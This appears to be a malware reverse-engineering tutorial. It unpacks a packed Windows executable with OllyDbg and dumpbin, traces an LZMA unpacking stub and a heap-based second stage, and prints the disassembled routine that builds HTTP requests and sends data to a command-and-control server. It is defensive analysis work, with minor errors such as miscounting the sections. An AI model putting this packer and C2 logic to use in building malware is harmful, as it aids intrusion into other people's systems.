Tools Required:
Ollydbg Debugger.
OllyDump plugin.
IMPREC import Fixer.
Filename: packed.exe Before starting, we will dump the headers of exe which is packed.exe and we will then check out the structure of exe including the section headers. There is a tool known as dumpbin which is included as a part of windows sdk
dumpbin /all
Here is the ouput we get from dumpbin program
[plain] Microsoft (R) COFF/PE Dumper Version 8.00.50727.42 Copyright (C) Microsoft Corporation. All rights reserved.
Dump of file Sample
PE signature found
File Type: EXECUTABLE IMAGE
FILE HEADER VALUES 14C machine (x86) 4 number of sections 51BD9FFA time date stamp Sun Jun 16 16:52:34 2013 0 file pointer to symbol table 0 number of symbols E0 size of optional header 10F characteristics Relocations stripped Executable Line numbers stripped Symbols stripped 32 bit word machine
OPTIONAL HEADER VALUES 10B magic # (PE32) 7.02 linker version 4000 size of code 200 size of initialized data 0 size of uninitialized data 22000 entry point (00422000) 1000 base of code 5000 base of data 400000 image base (00400000 to 00424B75) 1000 section alignment 200 file alignment 5.01 operating system version 0.00 image version 5.01 subsystem version 0 Win32 version 24B76 size of image 400 size of headers 0 checksum 2 subsystem (Windows GUI) 3 DLL characteristics RESERVED – UNKNOWN RESERVED – UNKNOWN 100000 size of stack reserve 1000 size of stack commit 100000 size of heap reserve 1000 size of heap commit 0 loader flags 10 number of directories 0 [ 0] RVA [size] of Export Directory 24A94 [ E2] RVA [size] of Import Directory 6000 [ 1B92C] RVA [size] of Resource Directory 0 [ 0] RVA [size] of Exception Directory 0 [ 0] RVA [size] of Certificates Directory 0 [ 0] RVA [size] of Base Relocation Directory 0 [ 0] RVA [size] of Debug Directory 0 [ 0] RVA [size] of Architecture Directory 0 [ 0] RVA [size] of Global Pointer Directory 0 [ 0] RVA [size] of Thread Storage Directory 0 [ 0] RVA [size] of Load Configuration Directory 0 [ 0] RVA [size] of Bound Import Directory 0 [ 0] RVA [size] of Import Address Table Directory 22BC [ 40] RVA [size] of Delay Import Directory 0 [ 0] RVA [size] of COM Descriptor Directory 5000 [ 71] RVA [size] of Reserved Directory
SECTION HEADER #1 .text name 4000 virtual size 1000 virtual address (00401000 to 00404FFF) 800 size of raw data 400 file pointer to raw data (00000400 to 00000BFF) 0 file pointer to relocation table 0 file pointer to line numbers 0 number of relocations 0 number of line numbers 60000020 flags Code Execute Read
SECTION HEADER #2 .rdata name 91E virtual size 5000 virtual address (00405000 to 0040591D) 200 size of raw data C00 file pointer to raw data (00000C00 to 00000DFF) 0 file pointer to relocation table 0 file pointer to line numbers 0 number of relocations 0 number of line numbers 80000040 flags Initialized Data Write Only
SECTION HEADER #3 .RES name 1BA00 virtual size 6000 virtual address (00406000 to 004219FF) 19200 size of raw data E00 file pointer to raw data (00000E00 to 00019FFF) 0 file pointer to relocation table 0 file pointer to line numbers 0 number of relocations 0 number of line numbers C0000040 flags Initialized Data Read Write
SECTION HEADER #4 .RENOS name 2B76 virtual size 22000 virtual address (00422000 to 00424B75) 2C00 size of raw data 1A000 file pointer to raw data (0001A000 to 0001CBFF) 0 file pointer to relocation table 0 file pointer to line numbers 0 number of relocations 0 number of line numbers E0000040 flags Initialized Data Execute Read Write
Summary
3000 .RENOS 1C000 .RES 1000 .rdata 4000 .text [/plain]
There are three sections namely .RENOS .RES .RDATA and .text, which is enough to prove that it wasn’t made from a standard compiler and most probably is a packer or compressor.
The following is the output we get from debugger output at the entry point of the executable:
[plain] 00422000 > 68 00204200 PUSH OFFSET Sample. 00422005 B8 80204200 MOV EAX,Sample.00422080 0042200A FFD0 CALL EAX 0042200C 83C4 04 ADD ESP,4 0042200F B8 67224000 MOV EAX,Sample.00402267 00422014 FFE0 JMP EAX 00422016 2200 AND AL,BYTE PTR DS:[EAX] [/plain]
00422014 FFE0 JMP EAX We can see here that the compressor jumps to the original entry point of the executable. Before that a call is made to Sample.00422080 which is possibly the compression routine of the executable.
Now let’s try to look into the subroutine:
[plain] 00422080 55 PUSH EBP 00422081 89E5 MOV EBP,ESP 00422083 57 PUSH EDI 00422084 56 PUSH ESI 00422085 53 PUSH EBX 00422086 83EC 2C SUB ESP,2C 00422089 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 0042208C 8078 7C 00 CMP BYTE PTR DS:[EAX+7C],0 00422090 0F85 64010000 JNZ Samplecc.004221FA 00422096 C745 E0 00000000 MOV DWORD PTR SS:[EBP-20],0 0042209D 8B40 6C MOV EAX,DWORD PTR DS:[EAX+6C] 004220A0 8B08 MOV ECX,DWORD PTR DS:[EAX] 004220A2 394D E0 CMP DWORD PTR SS:[EBP-20],ECX 004220A5 8D58 04 LEA EBX,DWORD PTR DS:[EAX+4] 004220A8 894D E4 MOV DWORD PTR SS:[EBP-1C],ECX 004220AB E9 8C000000 JMP Samplecc.0042213C 004220B0 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8] 004220B3 8D45 EC LEA EAX,DWORD PTR SS:[EBP-14] 004220B6 8B51 20 MOV EDX,DWORD PTR DS:[ECX+20] 004220B9 894424 0C MOV DWORD PTR SS:[ESP+C],EAX 004220BD B8 04000000 MOV EAX,4 004220C2 894424 08 MOV DWORD PTR SS:[ESP+8],EAX 004220C6 8B43 08 MOV EAX,DWORD PTR DS:[EBX+8] 004220C9 894424 04 MOV DWORD PTR SS:[ESP+4],EAX 004220CD 8B03 MOV EAX,DWORD PTR DS:[EBX] 004220CF 8B79 70 MOV EDI,DWORD PTR DS:[ECX+70] 004220D2 01F8 ADD EAX,EDI 004220D4 890424 MOV DWORD PTR SS:[ESP],EAX 004220D7 FF12 CALL DWORD PTR DS:[EDX] 004220D9 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8] 004220DC 8B03 MOV EAX,DWORD PTR DS:[EBX] [/plain]
After analyzing the algorithm we have come to know as a LZMA compression algorithm,
which decompresses data at 0x00401000
JMP EAX is the place where we jump to when the original entry point is taken place:
[plain] 00402267 . 60 PUSHAD 00402268 . F8 CLC 00402269 . 1BFF SBB EDI,EDI 0040226B . 8B35 6C504000 MOV ESI,DWORD PTR DS:[40506C] ; DBGHELP.ImageRvaToVa 00402271 . 68 5E534000 PUSH Samplecc.0040535E ; /pModule = "" 00402276 . 832C24 40 SUB DWORD PTR SS:[ESP],40 ; | 0040227A . FF15 38504000 CALL DWORD PTR DS:[405038] ; GetModuleHandleA 00402280 . 96 XCHG EAX,ESI 00402281 . 09F7 OR EDI,ESI 00402283 . 2BC7 SUB EAX,EDI 00402285 . B9 0000FFFF MOV ECX,FFFF0000 0040228A . F7D9 NEG ECX 0040228C . 3BC1 CMP EAX,ECX 0040228E . 76 1F JBE SHORT Samplecc.004022AF 00402290 . 46 INC ESI 00402291 . 56 PUSH ESI 00402292 . 59 POP ECX 00402293 . 1349 3B ADC ECX,DWORD PTR DS:[ECX+3B] 00402296 . 68 60000000 PUSH 60 0040229B . 83E9 85 SUB ECX,-7B 0040229E . 5B POP EBX 0040229F . 3B19 CMP EBX,DWORD PTR DS:[ECX] 004022A1 . 73 0C JNB SHORT Samplecc.004022AF 004022A3 . 33F6 XOR ESI,ESI 004022A5 . 81EE 1E534000 SUB ESI,Samplecc.0040531E ; ASCII “DBGHELP.dll” 004022AB . F7DE NEG ESI 004022AD .^EB A9 JMP SHORT Samplecc.00402258 004022AF > B9 00040000 MOV ECX,400 004022B4 >-E2 FE LOOPD SHORT Samplecc.004022B4 004022B6 . 61 POPAD 004022B7 . C3 RETN [/plain]
The second phase of unpacking extracted binary code in a heap region.
Which is present here:
[plain] 003C00C4 5D POP EBP ; 003C0694 003C00C5 5E POP ESI 003C00C6 873424 XCHG DWORD PTR SS:[ESP],ESI 003C00C9 56 PUSH ESI 003C00CA E8 31050000 CALL 003C0600 003C00CF E8 6F050000 CALL 003C0643 003C00D4 8BF8 MOV EDI,EAX 003C00D6 6A 00 PUSH 0 003C00D8 6A 00 PUSH 0 003C00DA FF75 6C PUSH DWORD PTR SS:[EBP+6C] 003C00DD 57 PUSH EDI 003C00DE FF55 28 CALL DWORD PTR SS:[EBP+28] 003C00E1 8B4D 70 MOV ECX,DWORD PTR SS:[EBP+70] 003C00E4 6A 00 PUSH 0 003C00E6 54 PUSH ESP [/plain]
Decrypted bytes are copied into heap region here
[plain] 003C0190 F3:AA REP STOS BYTE PTR ES:[EDI] 003C0192 5F POP EDI 003C0193 8BCB MOV ECX,EBX 003C0195 F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[> 003C0197 FF55 0C CALL DWORD PTR SS:[EBP+C] [/plain]
Connection to c2c:
After unpacking, the following is where the information downloads and uploads the configuration to c2c verser
[plain] 004035A0 |. FF75 AC PUSH DWORD PTR SS:[EBP-54] ; /<%s> 004035A3 |. FF75 FC PUSH DWORD PTR SS:[EBP-4] ; |<%s> 004035A6 |. FF75 B4 PUSH DWORD PTR SS:[EBP-4C] ; |<%s> 004035A9 |. 68 00344000 PUSH 6fe5860a.00403400 ; |Format = “GET %s HTTP/1.0 Host: %s Accept-Language: en-US Accept: / Accept-Encoding: identity, *;q=0 Connection: close User-Agent: %s
" 004035AE |. FF75 BC PUSH DWORD PTR SS:[EBP-44] ; |s 004035B1 |. E8 8ED50000 CALL 6fe5860a.00410B44 ; wsprintfA 004035B6 |. 83C4 14 ADD ESP,14 004035B9 |. EB 1B JMP SHORT 6fe5860a.004035D6 004035BB |> 68 BB474100 PUSH 6fe5860a.004147BB ; /<%s> = “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)” 004035C0 |. FF75 FC PUSH DWORD PTR SS:[EBP-4] ; |<%s> 004035C3 |. FF75 B4 PUSH DWORD PTR SS:[EBP-4C] ; |<%s> 004035C6 |. 68 00344000 PUSH 6fe5860a.00403400 ; |Format = “GET %s HTTP/1.0 Host: %s Accept-Language: en-US Accept: / Accept-Encoding: identity, *;q=0 Connection: close User-Agent: %s
" 004035CB |. FF75 BC PUSH DWORD PTR SS:[EBP-44] ; |s 004035CE |. E8 71D50000 CALL 6fe5860a.00410B44 ; wsprintfA 004035D3 |. 83C4 14 ADD ESP,14 004035D6 |> 0FB745 D8 MOVZX EAX,WORD PTR SS:[EBP-28] 004035DA |. 50 PUSH EAX 004035DB |. 6A 00 PUSH 0 004035DD |. FF75 FC PUSH DWORD PTR SS:[EBP-4] 004035E0 |. E8 1EFAFFFF CALL <Connect_to_c2c> [/plain]
Inside connect_to_c2c we are able to locate call to send
[plain] 00403087 /$ 55 PUSH EBP 00403088 |. 8BEC MOV EBP,ESP 0040308A |. 53 PUSH EBX 0040308B |. 57 PUSH EDI 0040308C |. 837D 10 00 CMP DWORD PTR SS:[EBP+10],0 00403090 |. 75 0B JNZ SHORT 6fe5860a.0040309D 00403092 |. B8 01000000 MOV EAX,1 00403097 |. 5F POP EDI 00403098 |. 5B POP EBX 00403099 |. C9 LEAVE 0040309A |. C2 0C00 RETN 0C 0040309D |> 8B7D 0C MOV EDI,DWORD PTR SS:[EBP+C] 004030A0 |. BB 00000000 MOV EBX,0 004030A5 |> 6A 00 /PUSH 0 ; /Flags = 0 004030A7 |. FF75 10 |PUSH DWORD PTR SS:[EBP+10] ; |DataSize 004030AA |. 57 |PUSH EDI ; |Data 004030AB |. FF75 08 |PUSH DWORD PTR SS:[EBP+8] ; |Socket 004030AE |. E8 33DB0000 |CALL 6fe5860a.00410BE6 ; send 004030B3 |. 85C0 |TEST EAX,EAX 004030B5 |. 7E 14 |JLE SHORT 6fe5860a.004030CB 004030B7 |. 03F8 |ADD EDI,EAX 004030B9 |. 2945 10 |SUB DWORD PTR SS:[EBP+10],EAX 004030BC |. 837D 10 00 |CMP DWORD PTR SS:[EBP+10],0 004030C0 |. 75 07 |JNZ SHORT 6fe5860a.004030C9 004030C2 |. BB 01000000 |MOV EBX,1 004030C7 |. EB 02 |JMP SHORT 6fe5860a.004030CB 004030C9 |>^EB DA JMP SHORT 6fe5860a.004030A5 004030CB |> 8BC3 MOV EAX,EBX 004030CD |. 5F POP EDI 004030CE |. 5B POP EBX 004030CF |. C9 LEAVE 004030D0 . C2 0C00 RETN 0C [/plain]
